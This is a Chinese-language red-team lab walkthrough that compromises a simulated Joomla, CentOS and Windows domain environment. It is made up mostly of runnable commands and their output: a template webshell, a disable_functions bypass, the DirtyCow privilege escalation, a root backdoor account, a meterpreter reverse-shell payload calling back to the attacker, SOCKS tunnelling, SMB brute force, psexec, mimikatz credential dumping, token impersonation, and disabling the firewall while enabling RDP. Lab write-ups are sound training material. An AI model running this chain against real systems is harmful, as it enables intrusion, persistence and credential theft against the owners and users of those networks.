ATT&CK红队评估实战靶场(三)
靶场搭建
- 修改仅主机网卡 A IP为
192.168.93.0,然后在添加一张仅主机网卡B,ip随意,我这里为192.168.213.0网段 - web主机网卡内网设置网卡 A,出口网卡为网卡B
- 其余主机网卡都是仅主机网卡 A
- 内网测试,访问web主机服务是否正常
目标:域控中存在一份重要文件。
主机发现端口扫描
扫描网段内存活主机
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15nmap -sP 192.168.213.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 13:37 CST
Nmap scan report for 192.168.213.1
Host is up (0.000072s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.213.2
Host is up (0.00011s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.213.130
Host is up (0.00025s latency).
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap scan report for 192.168.213.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:F1:A9:3F (VMware)
Nmap scan report for 192.168.213.129根据靶机是我添加的最后一台靶机,所以靶机IP是
156,kali的IP是150扫描靶机端口
1
2
3
4
5
6
7
8
9
10nmap -sT -min-rate 10000 -p- 192.168.213.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 13:38 CST
Nmap scan report for 192.168.213.130
Host is up (0.00057s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)SSH,WEB,MYSQL端口扫描主机服务版本以及系统版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15nmap -sV -sT -O -p 22,80,3306 192.168.213.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 13:39 CST
Nmap scan report for 192.168.213.130
Host is up (0.00037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
80/tcp open http nginx 1.9.4
3306/tcp open mysql MySQL 5.7.27-0ubuntu0.16.04.1
MAC Address: 00:0C:29:32:46:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10扫描主机服务漏洞,使用
nmap扫描1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36nmap -script=vuln -p 22,80,3306 192.168.213.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 13:39 CST
Nmap scan report for 192.168.213.130
Host is up (0.00049s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-dombased-xss:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.213.130
| Found the following indications of potential DOM based XSS:
|
| Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no')
|_ Pages: http://192.168.213.130:80/, http://192.168.213.130:80/, http://192.168.213.130:80/, http://192.168.213.130:80/, http://192.168.213.130:80/index.php/3-welcome-to-your-blog, http://192.168.213.130:80
| http-enum:
| /administrator/: Possible admin folder
| /administrator/index.php: Possible admin folder
| /robots.txt: Robots file
| /administrator/manifests/files/joomla.xml: Joomla version 3.9.12
| /language/en-GB/en-GB.xml: Joomla version 3.9.12
| /htaccess.txt: Joomla!
| /README.txt: Interesting, a readme.
| /bin/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /includes/: Potentially interesting folder
| /libraries/: Potentially interesting folder
| /modules/: Potentially interesting folder
| /templates/: Potentially interesting folder
|_ /tmp/: Potentially interesting folder
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 75.86 seconds80端口枚举出很多路径,以及CMS估计是Joomla,3306端口发现cve2012-2122,但是脚本注入失败优先级:
80>3306>22
WEB渗透
访问主页,网站指纹识别
/image39.png)
当前网站CMS是
Joomla 3.9.12,Nginx,并且是反向代理的扫描一下网站目录
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49dirsearch -u http://192.168.213.130 -x 403,404 -e php,zip,html,txt
//
[13:53:25] Starting:
[13:53:30] 200 - 24KB - /1.php
[13:53:38] 301 - 326B - /administrator -> http://192.168.213.130/administrator/
[13:53:38] 200 - 2KB - /administrator/
[13:53:38] 200 - 527B - /administrator/includes/
[13:53:38] 200 - 31B - /administrator/cache/
[13:53:38] 200 - 31B - /administrator/logs/
[13:53:38] 200 - 2KB - /administrator/index.php
[13:53:38] 301 - 331B - /administrator/logs -> http://192.168.213.130/administrator/logs/
[13:53:42] 301 - 316B - /bin -> http://192.168.213.130/bin/
[13:53:42] 200 - 31B - /bin/
[13:53:43] 301 - 318B - /cache -> http://192.168.213.130/cache/
[13:53:43] 200 - 31B - /cache/
[13:53:44] 200 - 31B - /cli/
[13:53:44] 301 - 323B - /components -> http://192.168.213.130/components/
[13:53:44] 200 - 31B - /components/
[13:53:45] 200 - 0B - /configuration.php
[13:53:45] 200 - 2KB - /configuration.php~
[13:53:52] 200 - 1KB - /htaccess.txt
[13:53:53] 301 - 319B - /images -> http://192.168.213.130/images/
[13:53:53] 200 - 31B - /images/
[13:53:53] 301 - 321B - /includes -> http://192.168.213.130/includes/
[13:53:53] 200 - 31B - /includes/
[13:53:53] 200 - 4KB - /index.php
[13:53:53] 200 - 3KB - /index.php/login/
[13:53:55] 301 - 321B - /language -> http://192.168.213.130/language/
[13:53:55] 200 - 31B - /layouts/
[13:53:56] 301 - 322B - /libraries -> http://192.168.213.130/libraries/
[13:53:56] 200 - 31B - /libraries/
[13:53:56] 200 - 7KB - /LICENSE.txt
[13:53:58] 301 - 318B - /media -> http://192.168.213.130/media/
[13:53:58] 200 - 31B - /media/
[13:53:59] 301 - 320B - /modules -> http://192.168.213.130/modules/
[13:53:59] 200 - 31B - /modules/
[13:54:05] 301 - 320B - /plugins -> http://192.168.213.130/plugins/
[13:54:05] 200 - 31B - /plugins/
[13:54:07] 200 - 2KB - /README.txt
[13:54:08] 200 - 392B - /robots.txt
[13:54:14] 301 - 322B - /templates -> http://192.168.213.130/templates/
[13:54:14] 200 - 31B - /templates/
[13:54:14] 200 - 31B - /templates/index.html
[13:54:14] 200 - 0B - /templates/beez3/
[13:54:14] 200 - 0B - /templates/protostar/
[13:54:14] 200 - 0B - /templates/system/
[13:54:15] 301 - 316B - /tmp -> http://192.168.213.130/tmp/
[13:54:15] 200 - 31B - /tmp/
[13:54:19] 200 - 628B - /web.config.txt1.php是phpinfo/administrator登陆页面/configuration.php~Joomle的配置文件嗯?还有回显,访问得到如下信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62请ç¨å€™è®¿é—®ã€‚';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'test';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $debug_lang_const = '1';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'testuser';
public $password = 'cvcvgjASD!@';
public $db = 'joomla';
public $dbprefix = 'am2zu_';
public $live_site = '';
public $secret = 'gXN9Wbpk7ef3A4Ys';
public $gzip = '0';
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
public $ftp_host = '';
public $ftp_port = '';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
public $ftp_enable = '0';
public $offset = 'UTC';
public $mailonline = '1';
public $mailer = 'mail';
public $mailfrom = 'test@test.com';
public $fromname = 'test';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = '0';
public $smtpuser = '';
public $smtppass = '';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = '25';
public $caching = '0';
public $cache_handler = 'file';
public $cachetime = '15';
public $cache_platformprefix = '0';
public $MetaDesc = '';
public $MetaKeys = '';
public $MetaTitle = '1';
public $MetaAuthor = '1';
public $MetaVersion = '0';
public $robots = '';
public $sef = '1';
public $sef_rewrite = '0';
public $sef_suffix = '0';
public $unicodeslugs = '0';
public $feed_limit = '10';
public $feed_email = 'none';
public $log_path = '/var/www/html/administrator/logs';
public $tmp_path = '/var/www/html/tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $shared_session = '0';
}得到了数据库账号
testuser密码cvcvgjASD!@,以及网站的根目录/var/www/html/
尝试登录MYSQL,使用
Navicat/image40.png)
登陆成功
进入数据库后台后,查找敏感数据
找到后台管理员的数据,在
am2zu_users表下1
891 Super User administrator test@test.com $2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2
尝试使用
john破解,但是无果,尝试修改MYSQL表文件将得到的后台管理员密码拿去识别得知是Bcrypt加密,是为了抗爆发明的,所以john破解无果(太慢了)
我们将123456进行Bcrypt加密,得到
1
$2a$10$JYEZiw0pCY1NV9ZVsaJ39uAgaXUpzCvaFxvBDPwMBlQEkYmD7RXPi
然后将其替换到
administrator上去,登陆后台,成功进入后台
后台利用
使用账号
administrator密码123456登录后台/image41.png)
获取到系统信息
1
2
3
4
5
6
7
8
9
10
11
12Setting Value
PHP Built On Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64
Database Type mysql
Database Version 5.7.27-0ubuntu0.16.04.1
Database Collation utf8_general_ci
Database Connection Collation utf8mb4_general_ci
PHP Version 7.1.32-1+ubuntu16.04.1+deb.sury.org+1
Web Server Apache/2.4.18 (Ubuntu)
WebServer to PHP Interface apache2handler
Joomla! Version Joomla! 3.9.12 Stable [ Amani ] 24-September-2019 15:00 GMT
Joomla! Platform Version Joomla Platform 13.1.0 Stable [ Curiosity ] 24-Apr-2013 00:00 GMT
User Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0通过模板
getshell修改模板
Extensions–>Templates–>Templates–>Beez3 Details and Files的error.php文件,将内容替换为一句木马/image42.png)
访问
error.php文件1
/templates/beez3/error.php
使用蚁🗡连接,连接成功
/image43.png)
获得shell ?
利用蚁🗡进行反弹
shell/image44.png)
返回
ret=127寻找原因,查看之前的
1.php/image45.png)
将执行函数禁用了(我前面使用
MSF生成反弹shell代码一直不成功都怀疑自己了,原来是这里卡住了)绕过Disable Functions
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
将
bypass_disablefunc.php和bypass_disablefunc_x64.so通过蚁🗡上传到当前目录测试,输入
url测试pwd命令1
?cmd=pwd&outpath=/var/www/html/output&sopath=/var/www/html/bypass_disablefunc_x64.so
/image46.png)
尝试了反弹
shell但是没有成功
内网信息收集
蚁🗡由绕过Disable Functions的插件,安装后虚拟终端可以正常回显
信息收集
1
2
3
4
5
6
7
8
9
10
11
12
13(www-data:/var/www/html/templates/beez3) $ ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:ab:32:ac brd ff:ff:ff:ff:ff:ff
inet 192.168.93.120/24 brd 192.168.93.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:feab:32ac/64 scope link
valid_lft forever preferred_lft forever确定web服务器的IP是
192.168.93.1201
2
3
4
5
6(www-data:/var/www/html/templates/beez3) $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(www-data:/var/www/html/templates/beez3) $ whoami
www-data
(www-data:/var/www/html/templates/beez3) $ uname -a
Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux寻找敏感内容
/tmp下存在test.txt,像是一个用户1
2
3(www-data:/tmp/mysql) $ cat test.txt
adduser wwwuser
passwd wwwuser_123Aqx
拿到一个用户的信息,我们尝试登录
ssh,登陆成功1
2
3
4ssh wwwuser@192.168.213.130 -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa
wwwuser@192.168.213.130's password:
Last login: Sun Oct 6 20:24:43 2019 from 192.168.1.122
[wwwuser@localhost ~]$查看其IP信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16[wwwuser@localhost ~]$ ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:32:46:c9 brd ff:ff:ff:ff:ff:ff
inet 192.168.213.130/24 brd 192.168.213.255 scope global eth0
inet6 fe80::20c:29ff:fe32:46c9/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:32:46:d3 brd ff:ff:ff:ff:ff:ff
inet 192.168.93.100/24 brd 192.168.93.255 scope global eth1
inet6 fe80::20c:29ff:fe32:46d3/64 scope link
valid_lft forever preferred_lft forever两张网卡,可以知道这个是
nginx服务器的主机,用来做反向代理的,内网IP是192.168.93.100查看代理配置
/etc/nginx/nginx.conf1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29http {
server {
listen 80;
server_name localhost;
location / {
proxy_pass http://192.168.93.120;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr; #获取真实ip
proxy_connect_timeout 90;
proxy_send_timeout 90;
proxy_read_timeout 90;
proxy_buffer_size 4k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 64k;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;#获取代理者的真实ip
proxy_redirect off;
}
}
}
stream {
upstream proxy_name {
server 192.168.93.120:3306;
}
server {
listen 3306;
proxy_pass proxy_name;
}
}
提权
尝试提权
nginx主机,方便后续操作,查看内核2.6.32在脏牛(DirtyCow)(CVE-2016-5195)的范围内1
2[wwwuser@localhost tmp]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/LinuxEXP地址https://github.com/FireFart/dirtycow将EXP传到靶机上去,然后编译执行
1
2gcc -pthread dirty.c -o dirty -lcrypt
./dirty 1234561
2
3
4
5
6
7
8
9
10
11
12
13
14
15[wwwuser@localhost tmp]$ ./dirty 123456
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 123456
Complete line:
firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash
mmap: 7f141f280000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd创建了一个新用户
firefart,密码是123456切换账户查看权限
1
2[firefart@localhost tmp]# id
uid=0(root) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023root!!!
添加新的超级管理员用户(权限维持,不过很明显)
1
echo "sunset:savbSWc4rx8NY:0:0::/:/bin/sh" >> passwd.bak
密码是
momaek,新建后将mv /tmp/passwd.bak /etc/passwdDON'T FORGET TO RESTORE!之后就可以登录
sunset用户来操作了
上线MSF
生成
payload1
msfvenom -p python/meterpreter/reverse_tcp lport=1234 lhost=192.168.213.129 -f raw > getshell.py
将
getshell.py上传到靶机,kali开启监听,执行getshell.py1
2
3
4
5
6# kali 开启监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 1234
msf6 exploit(multi/handler) > set lhost 192.168.213.129
msf6 exploit(multi/handler) > run1
2# 靶机执行文件
-sh-4.1# python getshell.py1
2
3
4
5
6
7msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.213.129:1234
[*] Sending stage (24772 bytes) to 192.168.213.130
[*] Meterpreter session 2 opened (192.168.213.129:1234 -> 192.168.213.130:42433) at 2024-11-25 22:30:03 +0800
meterpreter >上线成功
内网主机&信息探测
上线
MSF后,添加通向内网的路由1
2
3
4
5
6
7
8
9
10
11
12
13
14meterpreter > run post/multi/manage/autoroute
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
169.254.0.0 255.255.0.0 Session 1
192.168.93.0 255.255.255.0 Session 1
192.168.213.0 255.255.255.0 Session 1使用**
Earthworm**在kali和Centos中建立一条隧道earthworm搭建socks5反向代理服务 是为了让kali(攻击者)的程序进入内网,可以扫描内网主机信息等ew流量走向:本地流量–本地
1080端口–web服务器8888端口(利用EW)– 内网服务器 – web服务器的8888端口 – 本地1080端口Kali(此处用的是反向的)
1
2
3
4./ew_for_linux64 -s rcsocks -l 1080 -e 8888
rcsocks 0.0.0.0:1080 <--[10000 usec]--> 0.0.0.0:8888
init cmd_server_for_rc here
start listen port hereCentos
1
./ew_for_linux64 -s rssocks -d 192.168.213.129 -e 8888
设置
proxychain4,注意:proxychain4只能代理TCP或者UDP1
2# vim /etc/proxychains4.conf
socks5 127.0.0.1 1080
测试,因为上面通过查看
Nginx的反向代理配置得知Web服务器为192.168.93.120,我们正常是不可以直接curl到内容,但是通过代理后就可以直接curl了1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16# 不经过代理
curl 192.168.93.120
curl: (7) Failed to connect to 192.168.93.120 port 80 after 0 ms: Could not connect to server
# 经过代理
proxychains4 curl 192.168.93.120
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.93.120:80 ... OK
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta charset="utf-8" />
<base href="http://192.168.93.120/" />
.....内网主机探测
进入
Centos命令行,然后上传fscan来扫描内网然后将扫描结果存放到
1.txt1
./fscan -h 192.168.93.1/24 > 1.txt
ICMP存活主机1
2
3
4
5(icmp) Target 192.168.93.100 is alive
(icmp) Target 192.168.93.10 is alive
(icmp) Target 192.168.93.20 is alive
(icmp) Target 192.168.93.30 is alive
(icmp) Target 192.168.93.120 is alive端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18192.168.93.120:3306 open
192.168.93.100:3306 open
192.168.93.20:1433 open
192.168.93.30:445 open
192.168.93.20:445 open
192.168.93.10:445 open
192.168.93.30:139 open
192.168.93.20:139 open
192.168.93.10:139 open
192.168.93.10:135 open
192.168.93.30:135 open
192.168.93.20:135 open
192.168.93.20:80 open
192.168.93.120:80 open
192.168.93.100:80 open
192.168.93.100:22 open
192.168.93.120:22 open
192.168.93.10:88 open主机系统
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19[*] NetInfo
[*]192.168.93.10
[->]WIN-8GA56TNV3MV
[->]192.168.93.10
[*] NetInfo
[*]192.168.93.30
[->]win7
[->]192.168.93.30
[*] NetInfo
[*]192.168.93.20
[->]win2008
[->]192.168.93.20
[*] OsInfo 192.168.93.30 (Windows 7 Professional 7601 Service Pack 1)
[*] OsInfo 192.168.93.10 (Windows Server 2012 R2 Datacenter 9600)
[*] OsInfo 192.168.93.20 (Windows Server (R) 2008 Datacenter 6003 Service Pack 2)
[*] NetBios 192.168.93.20 win2008.test.org Windows Server (R) 2008 Datacenter 6003 Service Pack 2
[*] NetBios 192.168.93.10 [+] DC:WIN-8GA56TNV3MV.test.org Windows Server 2012 R2 Datacenter 9600
[+] mysql 192.168.93.100:3306:root 123
[+] mysql 192.168.93.120:3306:root 123一台
WIN7,一台server2008,以及server2012并且都打开了445端口
总结当前信息
当前拿下了
Centos主机root权限,以及发现 域内主机win2008和win7以及域控WIN-8GA56TNV3MV,并且都开放了445端口
SMB 口令爆破
使用MSF的
smb_login模块进行爆破,尝试爆破win2008的1
2
3
4
5
6
7
8
9
10
11
12
13msf6 auxiliary(scanner/smb/smb_version) > use uxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set threads 5
msf6 auxiliary(scanner/smb/smb_login) > set SMBuser administrator
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.20
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /root/Desktop/Dict/Blasting_dictionary-master/top10W.txt
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.20:445 - 192.168.93.20:445 - Starting SMB login bruteforce
[+] 192.168.93.20:445 - 192.168.93.20:445 - Success: '.\administrator:123qwe!ASD' Administrator
[!] 192.168.93.20:445 - No active DB -- Credential data will not be saved!
[*] 192.168.93.20:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.93.20:445 - Bruteforce completed, 1 credential was successful.
[*] 192.168.93.20:445 - You can open an SMB session with these credentials and CreateSession set to true没想到成功了,的到密码
123qwe!ASD(这个密码是我自己加上去的,因为我的字典爆破不出来,网上的writeup很多师傅都可以爆破,我就加上了)再使用该密码测试域内其他机器
1
2
3
4
5
6
7
8
9
10msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.30:445 - 192.168.93.30:445 - Starting SMB login bruteforce
[+] 192.168.93.30:445 - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator
[!] 192.168.93.30:445 - No active DB -- Credential data will not be saved!
[*] 192.168.93.30:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.93.30:445 - Bruteforce completed, 1 credential was successful.
[*] 192.168.93.30:445 - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed最后发现
win2008和win7都是同一密码
使用psexec连接 & 抓取密码
使用MSF里边的模块 连接
192.168.93.201
2
3
4
5
6
7
8
9
10
11
12
13
14
15msf6 auxiliary(server/socks_proxy) > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.20
msf6 exploit(windows/smb/psexec) > set SMBUSER administrator
msf6 exploit(windows/smb/psexec) > set SMBpass 123qwe!ASD
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.93.20:445 - Connecting to the server...
[*] 192.168.93.20:445 - Authenticating to 192.168.93.20:445 as user 'administrator'...
[*] 192.168.93.20:445 - Selecting PowerShell target
[*] 192.168.93.20:445 - Executing the payload...
[+] 192.168.93.20:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.20:4444
[*] Sending stage (176198 bytes) to 192.168.93.20
[*] Meterpreter session 3 opened (192.168.93.100:42597 -> 192.168.93.20:4444 via session 2) at 2024-11-28 14:51:45 +0800查看权限
1
2meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM关闭防火墙以及开启远程桌面
1
2
3
4
5
6
7# 关闭防火墙
C:\Windows\system32>netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state off
# 注册表开启3389端口
C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
The operation completed successfully.测试连接远程桌面(记得
!前要加斜杠来转义)/image47.png)
连接成功
MSF加载mimikatz来抓取密码1
2
3
4
5
6
7
8
9
10
11
12
13
14C:\Windows\system32>exit
exit
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
[!] Loaded x86 Kiwi on an x64 architecture.
Success.mimikatz需要在x64下运行,我们ps打印正在运行程序1
2
3
4
5
6
7
8
9
10
11
12
13meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
300 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
320 616 SLsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\SLsvc.exe
408 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
628 536 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe迁移到
lsass.exe1
2
3meterpreter > migrate 628
[*] Migrating from 2720 to 628...
[*] Migration completed successfully.抓取密码
1
2
3
4
5
6
7
8
9meterpreter > creds_all
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TEST.ORG zxcASDqw123!!
Administrator WIN2008 123qwe!ASD抓取到域的管理员账户密码,密码为
zxcASDqw123!!
获取域控shell
上边抓到了域管理员的密码,我们使用
psexec连接1
2
3
4
5
6
7
8
9
10
11
12
13
14
15msf6 auxiliary(server/socks_proxy) > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set SMBUSER administrator
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.10
msf6 exploit(windows/smb/psexec) > set SMBPass zxcASDqw123!!
msf6 exploit(windows/smb/psexec) > set lport 4445
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.93.10:445 - Connecting to the server...
[*] 192.168.93.10:445 - Authenticating to 192.168.93.10:445 as user 'administrator'...
[*] 192.168.93.10:445 - Selecting PowerShell target
[*] 192.168.93.10:445 - Executing the payload...
[+] 192.168.93.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.10:4445
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) >没连上,挠头
换别的工具,新找到的一个工具,发现挺好用的
测试是否成功(密码的
!号前面记得加上斜杠转义)1
proxychains python3 wmiexec-pro.py TEST/administrator:zxcASDqw123\!\!@192.168.93.10 exec-command -command "ipconfig"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16[+] Getting command results...
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::1fa:2f8:97ac:1160%12
IPv4 Address. . . . . . . . . . . : 192.168.93.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Tunnel adapter isatap.{22AC77BB-4205-4120-89CB-C8F5240403E0}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :成功获取到域控IP
我们将其防火墙关闭
1
2proxychains python3 wmiexec-pro.py TEST/administrator:zxcASDqw123\!\!@192.168.93.10 firewall -firewall-profile disable
[+] All firewall profile has been disable.开启3389端口(RDP)服务
1
2
3
4proxychains python3 wmiexec-pro.py TEST/administrator:zxcASDqw123\!\!@192.168.93.10 rdp -enable
[+] Enabling RDP services and setting up firewall.
[+] RDP port: 3389
[+] RDP enabled!
窃取管理员
token令牌1
2
3
4
5
6
7
8
9
10
11
12
13
14# meterpreter > use incognito
# meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
TEST\administrator
WIN2008\Administrator
# meterpreter > impersonate_token "TEST\administrator"
[+] Delegation token available
[+] Successfully impersonated user TEST\administrator尝试连接远程桌面
1
2
3
4
5
6
7
8
9
10
11
12
13
14proxychains rdesktop 192.168.93.10 -p zxcASDqw123\!\! -u administrator -v
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
is_wm_active(): WM name: Xfwm
Connecting to server using NLA...
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.93.10:3389 ... OK
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
TLS Session info: (TLS1.2)-(DHE-CUSTOM1024)-(RSA-SHA1)-(AES-256-GCM)
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Failed to connect using NLA, trying with SSL
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.93.10:3389 ... OK
